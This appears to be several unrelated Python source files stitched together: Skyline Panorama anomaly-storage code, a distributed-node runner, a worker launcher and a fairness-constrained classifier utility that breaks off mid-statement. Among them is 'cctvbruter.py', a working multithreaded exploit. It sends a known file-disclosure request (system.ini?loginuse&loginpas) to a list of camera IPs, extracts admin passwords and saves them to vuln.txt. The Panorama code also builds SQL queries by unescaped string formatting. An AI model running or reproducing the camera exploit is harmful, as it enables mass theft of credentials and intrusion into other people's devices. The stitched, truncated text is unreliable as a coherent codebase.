value_valid: # @added 20171214 - Bug #2234: panorama metric_vars value check # Added exception handling here logger.info(traceback.format_exc()) logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return from_timestamp = None try: # metric_vars.from_timestamp # from_timestamp = str(metric_vars.from_timestamp) key = 'from_timestamp' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] from_timestamp = int(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - from_timestamp - %s' % from_timestamp) except: # @added 20160822 - Bug #1460: panorama check file fails # Added exception handling here logger.info(traceback.format_exc()) logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not from_timestamp: logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return metric_timestamp = None try: # metric_vars.metric_timestamp # metric_timestamp = str(metric_vars.metric_timestamp) key = 'metric_timestamp' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] metric_timestamp = int(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - metric_timestamp - %s' % metric_timestamp) except: logger.error('error :: failed to read metric_timestamp variable from check file - %s' % 
(metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not metric_timestamp: logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return algorithms = None try: # metric_vars.algorithms # algorithms = metric_vars.algorithms key = 'algorithms' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] algorithms = value_list[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - algorithms - %s' % str(algorithms)) except: logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not algorithms: logger.error('error :: failed to load algorithms variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return triggered_algorithms = None try: # metric_vars.triggered_algorithms # triggered_algorithms = metric_vars.triggered_algorithms key = 'triggered_algorithms' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] triggered_algorithms = value_list[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms)) except: logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not triggered_algorithms: logger.error('error :: failed to load triggered_algorithms variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return app = None try: # metric_vars.app # app = str(metric_vars.app) key = 'app' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] app = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - app - %s' % app) except: logger.error('error :: failed to read app variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not app: logger.error('error :: failed to load app variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return source = None try: # metric_vars.source # source = str(metric_vars.source) key = 'source' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] source = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - source - %s' % source) except: logger.error('error :: failed to read source variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not app: logger.error('error :: failed to load app variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return added_by = None try: # metric_vars.added_by # added_by = str(metric_vars.added_by) key = 'added_by' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] added_by = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - 
added_by - %s' % added_by) except: logger.error('error :: failed to read added_by variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not added_by: logger.error('error :: failed to load added_by variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return added_at = None try: # metric_vars.added_at # added_at = str(metric_vars.added_at) key = 'added_at' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] added_at = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - added_at - %s' % added_at) except: logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not added_at: logger.error('error :: failed to load added_at variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return record_anomaly = True cache_key = '%s.last_check.%s.%s' % (skyline_app, app, metric) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: cache_key - %s.last_check.%s.%s' % ( skyline_app, app, metric)) try: last_check = self.redis_conn.get(cache_key) except Exception as e: logger.error( 'error :: could not query cache_key - %s.last_check.%s.%s - %s' % ( skyline_app, app, metric, e)) last_check = None if last_check: record_anomaly = False logger.info( 'Panorama metric key not expired - %s.last_check.%s.%s' % ( skyline_app, app, metric)) # @added 20160907 - Handle Panorama stampede on restart after not running #26 # Allow to expire check if greater than PANORAMA_CHECK_MAX_AGE if max_age: now = time() anomaly_age = int(now) - int(metric_timestamp) if anomaly_age > max_age_seconds: record_anomaly = False logger.info( 'Panorama check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % ( metric, str(anomaly_age), str(max_age_seconds))) if not record_anomaly: logger.info('not recording anomaly for - %s' % (metric)) if os.path.isfile(str(metric_check_file)): try: os.remove(str(metric_check_file)) logger.info('metric_check_file removed - %s' % str(metric_check_file)) except OSError: pass return # Determine id of something thing def determine_id(table, key, value): """ Get the id of something from Redis or the database and create a new Redis key with the value if one does not exist. 
:param table: table name :param key: key name :param value: value name :type table: str :type key: str :type value: str :return: int or boolean """ query_cache_key = '%s.mysql_ids.%s.%s.%s' % (skyline_app, table, key, value) determined_id = None redis_determined_id = None if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: query_cache_key - %s' % (query_cache_key)) try: redis_known_id = self.redis_conn.get(query_cache_key) except: redis_known_id = None if redis_known_id: unpacker = Unpacker(use_list=False) unpacker.feed(redis_known_id) redis_determined_id = list(unpacker) if redis_determined_id: determined_id = int(redis_determined_id[0]) if determined_id: if determined_id > 0: return determined_id # Query MySQL # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query = 'select id FROM %s WHERE %s=\'%s\'' % (table, key, value) # nosec # @modified 20170916 - Bug #2166: panorama incorrect mysql_id cache keys # Wrap in except # results = self.mysql_select(query) results = None try: results = self.mysql_select(query) except: logger.error('error :: failed to determine results from - %s' % (query)) determined_id = 0 if results: try: determined_id = int(results[0][0]) except Exception as e: logger.error(traceback.format_exc()) logger.error('error :: determined_id is not an int') determined_id = 0 if determined_id > 0: # Set the key for a week if not redis_determined_id: try: self.redis_conn.setex(query_cache_key, 604800, packb(determined_id)) logger.info('set redis query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) except Exception as e: logger.error(traceback.format_exc()) logger.error('error :: failed to set query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) return int(determined_id) # @added 20170115 - Feature #1854: Ionosphere learn - generations # Added determination of the learn related variables # learn_full_duration_days, learn_valid_ts_older_than, # max_generations and max_percent_diff_from_origin value to the # insert statement if the table is the metrics table. if table == 'metrics' and key == 'metric': # Set defaults learn_full_duration_days = int(settings.IONOSPHERE_LEARN_DEFAULT_FULL_DURATION_DAYS) valid_learning_duration = int(settings.IONOSPHERE_LEARN_DEFAULT_VALID_TIMESERIES_OLDER_THAN_SECONDS) max_generations = int(settings.IONOSPHERE_LEARN_DEFAULT_MAX_GENERATIONS) max_percent_diff_from_origin = float(settings.IONOSPHERE_LEARN_DEFAULT_MAX_PERCENT_DIFF_FROM_ORIGIN) try: use_full_duration, valid_learning_duration, use_full_duration_days, max_generations, max_percent_diff_from_origin = get_ionosphere_learn_details(skyline_app, value) learn_full_duration_days = use_full_duration_days except: logger.error(traceback.format_exc()) logger.error('error :: failed to get_ionosphere_learn_details for %s' % value) logger.info('metric learn details determined for %s' % value) logger.info('learn_full_duration_days :: %s days' % (str(learn_full_duration_days))) logger.info('valid_learning_duration :: %s seconds' % (str(valid_learning_duration))) logger.info('max_generations :: %s' % (str(max_generations))) logger.info('max_percent_diff_from_origin :: %s' % (str(max_percent_diff_from_origin))) # INSERT because no known id # @modified 20170115 - Feature #1854: Ionosphere learn - generations # Added the learn_full_duration_days, learn_valid_ts_older_than, # max_generations and max_percent_diff_from_origin value to the # insert statement if the table is the metrics table. 
# insert_query = 'insert into %s (%s) VALUES (\'%s\')' % (table, key, value) if table == 'metrics' and key == 'metric': # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests insert_query_string = '%s (%s, learn_full_duration_days, learn_valid_ts_older_than, max_generations, max_percent_diff_from_origin) VALUES (\'%s\', %s, %s, %s, %s)' % ( table, key, value, str(learn_full_duration_days), str(valid_learning_duration), str(max_generations), str(max_percent_diff_from_origin)) insert_query = 'insert into %s' % insert_query_string # nosec else: insert_query = 'insert into %s (%s) VALUES (\'%s\')' % (table, key, value) # nosec logger.info('inserting %s into %s table' % (value, table)) try: results = self.mysql_insert(insert_query) except: logger.error(traceback.format_exc()) logger.error('error :: failed to determine the id of %s from the insert' % (value)) raise determined_id = 0 if results: determined_id = int(results) else: logger.error('error :: results not set') raise if determined_id > 0: # Set the key for a week if not redis_determined_id: try: self.redis_conn.setex(query_cache_key, 604800, packb(determined_id)) logger.info('set redis query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) except Exception as e: logger.error(traceback.format_exc()) logger.error('%s' % str(e)) logger.error('error :: failed to set query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) return determined_id logger.error('error :: failed to determine the inserted id for %s' % value) return False try: added_by_host_id = determine_id('hosts', 'host', added_by) except: logger.error('error :: failed to determine id of %s' % (added_by)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: app_id = determine_id('apps', 'app', app) except: logger.error('error :: failed to determine id of %s' % (app)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: source_id = determine_id('sources', 'source', source) except: logger.error('error :: failed to determine id of %s' % (source)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: metric_id = determine_id('metrics', 'metric', metric) except: logger.error('error :: failed to determine id of %s' % (metric)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False algorithms_ids_csv = '' for algorithm in algorithms: try: algorithm_id = determine_id('algorithms', 'algorithm', algorithm) except: logger.error('error :: failed to determine id of %s' % (algorithm)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False if algorithms_ids_csv == '': algorithms_ids_csv = str(algorithm_id) else: new_algorithms_ids_csv = '%s,%s' % (algorithms_ids_csv, str(algorithm_id)) algorithms_ids_csv = new_algorithms_ids_csv triggered_algorithms_ids_csv = '' for triggered_algorithm in triggered_algorithms: try: triggered_algorithm_id = determine_id('algorithms', 'algorithm', triggered_algorithm) except: logger.error('error :: failed to determine id of %s' % (triggered_algorithm)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False if triggered_algorithms_ids_csv == '': triggered_algorithms_ids_csv = str(triggered_algorithm_id) else: new_triggered_algorithms_ids_csv = '%s,%s' % ( triggered_algorithms_ids_csv, str(triggered_algorithm_id)) triggered_algorithms_ids_csv = new_triggered_algorithms_ids_csv 
logger.info('inserting anomaly') try: full_duration = int(metric_timestamp) - int(from_timestamp) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: full_duration - %s' % str(full_duration)) except: logger.error('error :: failed to determine full_duration') fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: anomalous_datapoint = round(float(value), 6) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: anomalous_datapoint - %s' % str(anomalous_datapoint)) except: logger.error('error :: failed to determine anomalous_datapoint') fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: columns = '%s, %s, %s, %s, %s, %s, %s, %s, %s' % ( 'metric_id', 'host_id', 'app_id', 'source_id', 'anomaly_timestamp', 'anomalous_datapoint', 'full_duration', 'algorithms_run', 'triggered_algorithms') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: columns - %s' % str(columns)) except: logger.error('error :: failed to construct columns string') logger.info(traceback.format_exc()) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query_string = '(%s) VALUES (%d, %d, %d, %d, %s, %.6f, %d, \'%s\', \'%s\')' % ( columns, metric_id, added_by_host_id, app_id, source_id, metric_timestamp, anomalous_datapoint, full_duration, algorithms_ids_csv, triggered_algorithms_ids_csv) query = 'insert into anomalies %s' % query_string # nosec except: logger.error('error :: failed to construct insert query') logger.info(traceback.format_exc()) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: anomaly insert - %s' % str(query)) try: anomaly_id = self.mysql_insert(query) logger.info('anomaly id - %d - created for %s at %s' % ( anomaly_id, metric, metric_timestamp)) except: logger.error('error :: failed to insert anomaly %s at %s' % ( anomaly_id, metric, metric_timestamp)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False # Set anomaly record cache key try: self.redis_conn.setex( cache_key, settings.PANORAMA_EXPIRY_TIME, packb(value)) logger.info('set cache_key - %s.last_check.%s.%s - %s' % ( skyline_app, app, metric, str(settings.PANORAMA_EXPIRY_TIME))) except Exception as e: logger.error( 'error :: could not query cache_key - %s.last_check.%s.%s - %s' % ( skyline_app, app, metric, e)) if os.path.isfile(str(metric_check_file)): try: os.remove(str(metric_check_file)) logger.info('metric_check_file removed - %s' % str(metric_check_file)) except OSError: pass return anomaly_id def run(self): """ Called when the process intializes. 
Determine if what is known in the Skyline DB blah """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: logger.info('removing %s' % skyline_app_logwait) os.remove(skyline_app_logwait) except OSError: logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) # See if I am known in the DB, if so, what are my variables # self.populate mysql # What is my host id in the Skyline panorama DB? # - if not known - INSERT hostname INTO hosts # What are the known apps? # - if returned make a dictionary # What are the known algorithms? # - if returned make a dictionary while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() if ENABLE_PANORAMA_DEBUG: logger.info('debug :: connected to Redis') except: logger.error('error :: cannot connect to redis at socket path %s' % ( settings.REDIS_SOCKET_PATH)) sleep(30) # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Report app up try: self.redis_conn.setex(skyline_app, 120, now) logger.info('updated Redis key for %s up' % skyline_app) except: logger.error('error :: failed to update Redis key for %s up' % skyline_app) if ENABLE_PANORAMA_DEBUG: # Make sure mysql is available mysql_down = True while mysql_down: query = 'SHOW TABLES' results = self.mysql_select(query) if results: mysql_down = False logger.info('debug :: tested database query - OK') else: logger.error('error :: failed to query database') sleep(30) if ENABLE_PANORAMA_DEBUG: try: query = 'SELECT id, test FROM test' result = self.mysql_select(query) logger.info('debug :: tested mysql SELECT query - OK') logger.info('debug :: result: %s' % str(result)) logger.info('debug :: result[0]: %s' % str(result[0])) logger.info('debug :: result[1]: %s' % str(result[1])) # Works # 2016-06-10 19:07:23 :: 4707 :: result: [(1, u'test1')] except: logger.error( 'error :: mysql error - %s' % traceback.print_exc()) logger.error('error :: failed to SELECT') # self.populate the database metatdata tables # What is my host id in the Skyline panorama DB? 
host_id = False # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec results = self.mysql_select(query) if results: host_id = results[0][0] logger.info('host_id: %s' % str(host_id)) else: logger.info('failed to determine host id of %s' % this_host) # - if not known - INSERT hostname INTO host if not host_id: logger.info('inserting %s into hosts table' % this_host) # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec host_id = self.mysql_insert(query) if host_id: logger.info('new host_id: %s' % str(host_id)) if not host_id: logger.error( 'error :: failed to determine populate %s into the hosts table' % this_host) sleep(30) continue # Like loop through the panorama dir and see if anyone has left you # any work, etc # Make sure check_dir exists and has not been removed try: if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: checking check dir exists - %s' % settings.PANORAMA_CHECK_PATH) os.path.exists(settings.PANORAMA_CHECK_PATH) except: logger.error('error :: check dir did not exist - %s' % settings.PANORAMA_CHECK_PATH) mkdir_p(settings.PANORAMA_CHECK_PATH) logger.info('check dir created - %s' % settings.PANORAMA_CHECK_PATH) os.path.exists(settings.PANORAMA_CHECK_PATH) # continue """ Determine if any metric has been added to add """ while True: metric_var_files = False try: metric_var_files = [f for f in listdir(settings.PANORAMA_CHECK_PATH) if isfile(join(settings.PANORAMA_CHECK_PATH, f))] except: logger.error('error :: failed to list files in check dir') logger.info(traceback.format_exc()) if not metric_var_files: logger.info('sleeping 20 no metric check files') sleep(20) # Discover metric anomalies to insert metric_var_files = False try: metric_var_files = [f for f in listdir(settings.PANORAMA_CHECK_PATH) if isfile(join(settings.PANORAMA_CHECK_PATH, f))] except: logger.error('error :: failed to list files in check dir') logger.info(traceback.format_exc()) if metric_var_files: break # @added 20190501 - Branch #2646: slack # Check if any Redis keys exist with a slack_thread_ts to update # any anomaly records slack_thread_ts_updates = None # @added 20190523 - Branch #3002: docker # Branch #2646: slack # Only check if slack is enabled if SLACK_ENABLED: try: slack_thread_ts_updates = list(self.redis_conn.scan_iter(match='panorama.slack_thread_ts.*')) except: logger.error(traceback.format_exc()) logger.error('error :: failed to scan panorama.slack_thread_ts.* from Redis') slack_thread_ts_updates = [] if not slack_thread_ts_updates: logger.info('no panorama.slack_thread_ts Redis keys to process, OK') if slack_thread_ts_updates: for cache_key in slack_thread_ts_updates: base_name = None metric_timestamp = None try: update_on = self.redis_conn.get(cache_key) # cache_key_value = [base_name, metric_timestamp, slack_thread_ts] update_for = literal_eval(update_on) base_name = str(update_for[0]) metric_timestamp = int(float(update_for[1])) slack_thread_ts = float(update_for[2]) except: logger.error(traceback.format_exc()) logger.error('error :: failed to get details from cache_key %s' % cache_key) update_db_record = False if base_name and metric_timestamp: update_db_record = True else: logger.info('Could not determine base_name and metric_timestamp from cache_key %s, deleting' % cache_key) try: self.redis_conn.delete(cache_key) except: 
logger.error(traceback.format_exc()) logger.error('error :: failed to delete cache_key %s' % cache_key) if update_db_record: # Spawn update_slack_thread_ts process pids = [] spawned_pids = [] pid_count = 0 now = time() for i in range(1, 2): try: p = Process(target=self.update_slack_thread_ts, args=(i, base_name, metric_timestamp, slack_thread_ts)) pids.append(p) pid_count += 1 logger.info('starting update_slack_thread_ts') p.start() spawned_pids.append(p.pid) except: logger.info(traceback.format_exc()) logger.error('error :: to start update_slack_thread_ts') continue p_starts = time() # @modified 20190509 - Branch #2646: slack # If the Skyline MySQL database is on a remote host # 2 seconds here is sometimes not sufficient so # increased to 10 while time() - p_starts <= 10: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info( '%s :: update_slack_thread_ts completed in %.2f seconds' % ( skyline_app, time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all update_slack_thread_ts processes' % (skyline_app)) for p in pids: p.terminate() metric_var_files_sorted = sorted(metric_var_files) metric_check_file = '%s/%s' % (settings.PANORAMA_CHECK_PATH, str(metric_var_files_sorted[0])) logger.info('assigning anomaly for insertion - %s' % str(metric_var_files_sorted[0])) # Spawn processes pids = [] spawned_pids = [] pid_count = 0 now = time() for i in range(1, settings.PANORAMA_PROCESSES + 1): try: p = Process(target=self.spin_process, args=(i, metric_check_file)) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.PANORAMA_PROCESSES))) p.start() spawned_pids.append(p.pid) except: logger.error('error :: to start spin_process') logger.info(traceback.format_exc()) continue # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than CRUCIBLE_TESTS_TIMEOUT p_starts = time() while time() - p_starts <= 20: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info( '%s :: %s spin_process/es completed in %.2f seconds' % ( skyline_app, str(settings.PANORAMA_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. 
logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() # p.join() check_file_name = os.path.basename(str(metric_check_file)) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_name - %s' % check_file_name) check_file_timestamp = check_file_name.split('.', 1)[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp)) check_file_metricname_txt = check_file_name.split('.', 1)[1] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt) check_file_metricname = check_file_metricname_txt.replace('.txt', '') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname - %s' % check_file_metricname) check_file_metricname_dir = check_file_metricname.replace('.', '/') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir) metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) for p in pids: if p.is_alive(): logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive()))) p.join()
run.py
from node import Node
import threading

f = open("input", 'r')
lines = f.readlines()

n = int(lines[0])
nodes = {}
for i in range(1, n + 1):
    nodes[i] = Node(uid=i, network_size=n)

uid = -1
for i in range((n * n) + 1):
    if len(lines[i].split()) == 4:
        tokens = lines[i].split()
        uid = int(tokens[0])
        nodes[uid].start_delay = int(tokens[1])
        nodes[uid].potential_leader_time_out = int(tokens[2])
        nodes[uid].propose_time_out = int(tokens[3])
    elif len(lines[i].split()) == 2:
        tokens = lines[i].split()
        address = nodes[int(tokens[0])].address
        nodes[uid].stream.add_sender(address, float(tokens[1]))
        nodes[uid].outgoing_addresses[int(tokens[0])] = address

for node in nodes.values():
    threading.Thread(target=node.run).start()
cctvbruter.py
#!/usr/bin/python # Bruteforce tool for CCTV RCE Exploit # You don't have to edit anything. import urllib.request, threading, socket, time, sys if len(sys.argv) != 2: print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ") sys.exit() lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0 # Open output.txt list = open("output.txt", "r") scan = list.read() list.close() scan = scan.split("\n") while "\n" in scan: scan.remove("\n") pretotal = len(scan) def dumpcreds(): global finalprintout global total global scan while len(scan) > 0: try: with lock: ip = scan.pop() with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response: reply = str(response.read()) if reply.find("admin") != -1: reply = reply[reply.find("admin"):] while reply.find("\\x00") != -1: reply = reply.replace("\\x00", "") password = reply[5:reply.find("\\")] if password.find("/") != -1: password = password[:password.find("/")] print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip) with lock: finalprintout += ip + ":admin:" + password + "\n" total += 1 except: pass print(" \x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m") print(" \x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to รขหœโ€ฆCamรขหœโ€ฆ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]") time.sleep(6) print(" \x1b[1;35mDumping Credentials, please wait") time.sleep(4) for i in range(0, threadcount+1): threads.append(threading.Thread(target=dumpcreds)) for thread in threads: try: thread.daemon = True thread.start() except: pass for thread in threads: try: thread.join() except: pass while 1: time.sleep(1) done = False for thread in threads: if thread.isAlive() == True: done = False break else: done = True if done == True: writingit = open("vuln.txt", "w") writingit.write(finalprintout) writingit.close() print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ") break
run_worker.py
import multiprocessing
import time
import argparse

from workers.km_worker import start_worker
import workers.loaded_index as li

parser = argparse.ArgumentParser()
parser.add_argument('-w', '--workers', default=1)
args = parser.parse_args()


def start_workers(do_multiprocessing=True):
    n_workers = args.workers
    if type(n_workers) is str:
        n_workers = int(n_workers)

    if do_multiprocessing:
        worker_processes = []
        for i in range(0, n_workers):
            p = multiprocessing.Process(target=start_worker)
            worker_processes.append(p)
            p.start()

        while True:
            # if a worker process is dead, restart it
            time.sleep(5)
            for i, worker in enumerate(worker_processes):
                if not worker or not worker.is_alive():
                    p = multiprocessing.Process(target=start_worker)
                    worker_processes[i] = p
                    p.start()
    else:
        start_worker()


def main():
    print('workers waiting 10 sec for redis to set up...')
    time.sleep(10)
    li.data_path = '/mnt/fast_km-data'
    start_workers()


if __name__ == '__main__':
    main()
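A minimal sketch, not part of run_worker.py: the restart loop above runs forever and leaves the spawned workers orphaned on Ctrl+C; the hypothetical helper below (`supervise` is an assumed name, and the target callable is passed in rather than imported) shows one way to terminate and join them on interrupt.

import multiprocessing
import time


def supervise(n_workers, target, poll_seconds=5):
    # Start the requested number of worker processes.
    procs = [multiprocessing.Process(target=target) for _ in range(n_workers)]
    for p in procs:
        p.start()
    try:
        while True:
            # Same restart-if-dead policy as above.
            time.sleep(poll_seconds)
            for i, p in enumerate(procs):
                if not p.is_alive():
                    procs[i] = multiprocessing.Process(target=target)
                    procs[i].start()
    except KeyboardInterrupt:
        # Tear the pool down cleanly instead of leaving children running.
        for p in procs:
            p.terminate()
        for p in procs:
            p.join()

# Usage (guard is required for multiprocessing on Windows):
# if __name__ == '__main__':
#     supervise(4, start_worker)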
utils.py
import numpy as np from random import seed, shuffle import loss_funcs as lf # our implementation of loss funcs from scipy.optimize import minimize # for loss func minimization from multiprocessing import Pool, Process, Queue from collections import defaultdict from copy import deepcopy import matplotlib.pyplot as plt # for plotting stuff import sys def train_model(x, y, x_control, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh, gamma=None): #print x[0],y[0],x_control, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh """ Function that trains the model subject to various fairness constraints. If no constraints are given, then simply trains an unaltered classifier. Example usage in: "synthetic_data_demo/decision_boundary_demo.py" ---- Inputs: X: (n) x (d+1) numpy array -- n = number of examples, d = number of features, one feature is the intercept y: 1-d numpy array (n entries) x_control: dictionary of the type {"s": [...]}, key "s" is the sensitive feature name, and the value is a 1-d list with n elements holding the sensitive feature values loss_function: the loss function that we want to optimize -- for now we have implementation of logistic loss, but other functions like hinge loss can also be added apply_fairness_constraints: optimize accuracy subject to fairness constraint (0/1 values) apply_accuracy_constraint: optimize fairness subject to accuracy constraint (0/1 values) sep_constraint: apply the fine grained accuracy constraint for details, see Section 3.3 of arxiv.org/abs/1507.05259v3 For examples on how to apply these constraints, see "synthetic_data_demo/decision_boundary_demo.py" Note: both apply_fairness_constraints and apply_accuracy_constraint cannot be 1 at the same time sensitive_attrs: ["s1", "s2", ...], list of sensitive features for which to apply fairness constraint, all of these sensitive features should have a corresponding array in x_control sensitive_attrs_to_cov_thresh: the covariance threshold that the classifier should achieve (this is only needed when apply_fairness_constraints=1, not needed for the other two constraints) gamma: controls the loss in accuracy we are willing to incur when using apply_accuracy_constraint and sep_constraint ---- Outputs: w: the learned weight vector for the classifier """ assert((apply_accuracy_constraint == 1 and apply_fairness_constraints == 1) == False) # both constraints cannot be applied at the same time max_iter = 100000 # maximum number of iterations for the minimization algorithm if apply_fairness_constraints == 0: constraints = [] else: constraints = get_constraint_list_cov(x, y, x_control, sensitive_attrs, sensitive_attrs_to_cov_thresh) if apply_accuracy_constraint == 0: #its not the reverse problem, just train w with cross cov constraints f_args=(x, y) w = minimize(fun = loss_function, x0 = np.random.rand(x.shape[1],), args = f_args, method = 'SLSQP', options = {"maxiter":max_iter}, constraints = constraints ) else: # train on just the loss function w = minimize(fun = loss_function, x0 = 